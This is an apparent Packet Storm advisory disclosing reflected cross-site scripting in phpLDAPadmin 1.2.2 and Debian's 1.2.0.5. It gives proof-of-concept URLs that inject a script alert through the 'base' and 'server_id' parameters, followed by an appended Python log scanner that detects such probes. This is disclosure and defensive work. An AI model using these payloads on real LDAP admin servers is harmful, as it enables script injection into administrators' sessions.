phpldapadmin 1.2.2 Cross Site Scripting

02 Feb 2012 00:00:00, reported by andsarmiento. Type: packetstorm. Source: packetstormsecurity.com

phpldapadmin 1.2.2 XSS vulnerability analysis

Attached is some PoC analysis related to an XSS vulnerability in phpldapadmin. I previously coordinated with the Cert-US so that they would contact Sourceforge and Debian, but heard back that they were unable to get in contact with them.  
  
The first discovery was on January 10 for version 1.1.6, after which I noticed that the same vulnerability had been discovered previously. For that reason I later tested version 1.2.2 (sourceforge) and 1.2.0.5 (Debian package).  
Further reference: see the attached files  
  
On January 24 I contacted sourceforge, and it appears they fixed the package, but the issue still persists in the debian packages.  
  
Fix from sourceforge:  
https://sourceforge.net/tracker/index.php?func=detail&aid=3477910&group_id=61828&atid=498546  
  
  
  
  
Background:  
===========  
phpLDAPadmin is a web-based LDAP client. It provides easy, anywhere-accessible, multilanguage administration for your LDAP server. Its hierarchical tree-viewer and advanced search functionality make it intuitive to browse and administer your LDAP directory. Since it is a web application, this LDAP browser works on many platforms, making your LDAP server easily manageable from any location.  
  
  
Details:  
========  
  
1.- Version 1.2.2 from Sourceforge package: http://sourceforge.net/projects/phpldapadmin/files/phpldapadmin-php5/1.2.2/phpldapadmin-1.2.2.tgz/download  
  
Exploitable URI: http://x.x.x.x/phpldapadmin/htdocs/cmd.php?cmd=query_engine&server_id=1&query=none&format=list&showresults=na&base=?&scope=sub&filter=objectClass%3D*&display_attrs=cn%2C+sn%2C+uid%2C+postalAddress%2C+telephoneNumber&orderby=&size_limit=50&search=Search  
  
PoC:  
http://x.x.x.x/phpldapadmin/htdocs/cmd.php?cmd=query_engine&server_id=1&query=none&format=list&showresults=na&base=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&scope=sub&filter=objectClass%3D*&display_attrs=cn%2C+sn%2C+uid%2C+postalAddress%2C+telephoneNumber&orderby=&size_limit=50&search=Search  
  
Exploitable variable: base  
  
Results: XSS passing through "base" variable.  
  
2.- Version 1.2.0.5 from Debian (testing and unstable repositories)  
Package:  
Version: 1.2.0.5-2  
Depends: apache2 | httpd, php5-ldap, libapache2-mod-php5 | libapache-mod-php5 | php5-cgi | php5, ucf (>= 0.28), debconf (>= 0.5) | debconf-2.0  
Filename: pool/main/p/phpldapadmin/phpldapadmin_1.2.0.5-2_all.deb  
Size: 1276080  
MD5sum: 3b4058f7fc74ff95f8223bf92bb99ec7  
SHA1: 2594603f2346de814195bc6aba5e97a4febb17fb  
SHA256: 4e1be7218c8030f1f17c5cd4c4f4fdb69cf5315d3e4b22bb2b4cabd7cfb93d57  
  
PoC:  
  
https://x.x.x.x/phpldapadmin/cmd.php?server_id=<script>alert('XSS')</script>  
https://x.x.x.x/phpldapadmin/index.php?server_id=<script>alert('XSS')</script>&redirect=false  
  
Exploitable variable: server_id  
  
Results: XSS passing through "server_id" variable.  
  
Impact: Remote attackers might be able to perform Cross-Site Scripting (XSS) attacks by various vectors.  
  
Thanks in advance for your comments  
Kind Regards  
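As an added example (not from the advisory or the phpLDAPadmin project), a small Python access-log check that flags requests carrying markup in the two parameters the advisory names, `base` and `server_id`, so a defender can spot probing of these endpoints; the log lines are constructed samples mirroring the PoC URLs above, and the `/phpldapadmin/` mount prefix is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Parameters the advisory reports as reflected without output encoding.
WATCHED_PARAMS = {"base", "server_id"}
# Loose markup markers; none belong in a base DN or a numeric server index.
MARKUP = re.compile(r"<\s*/?\s*[a-z]|javascript:|on\w+\s*=", re.IGNORECASE)
# Apache combined/common log format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
APP_PREFIX = "/phpldapadmin/"  # assumption: where the application is mounted

SAMPLE_LOG = [  # constructed lines; payloads mirror the advisory's PoC URLs
    '10.0.0.5 - - [02/Feb/2012:10:00:00 +0000] "GET /phpldapadmin/htdocs/cmd.php'
    '?cmd=query_engine&server_id=1&base=%3Cscript%3Ealert%28%27XSS%27%29%3C%2F'
    'script%3E&scope=sub HTTP/1.1" 200 5120',
    '10.0.0.6 - - [02/Feb/2012:10:00:01 +0000] "GET /phpldapadmin/htdocs/cmd.php'
    '?cmd=query_engine&server_id=1&base=dc%3Dexample%2Cdc%3Dcom HTTP/1.1" 200 4800',
    '10.0.0.7 - - [02/Feb/2012:10:00:02 +0000] "GET /phpldapadmin/index.php'
    '?server_id=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&redirect=false HTTP/1.1" 200 3900',
]

def suspicious_params(path):
    """Return {param: decoded value} for watched params whose value contains markup."""
    hits = {}
    for name, values in parse_qs(urlsplit(path).query, keep_blank_values=True).items():
        if name not in WATCHED_PARAMS:
            continue
        for value in values:
            decoded = unquote_plus(value)  # second pass catches double-encoded payloads
            if MARKUP.search(decoded):
                hits[name] = decoded
    return hits

def scan_log(lines):
    """Return (client ip, param, decoded value) for each suspicious phpLDAPadmin request."""
    alerts = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match or not match.group("path").startswith(APP_PREFIX):
            continue
        for param, value in suspicious_params(match.group("path")).items():
            alerts.append((match.group("ip"), param, value))
    return alerts

if __name__ == "__main__":
    for ip, param, value in scan_log(SAMPLE_LOG):
        print(f"{ip}: markup in '{param}': {value!r}")
```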
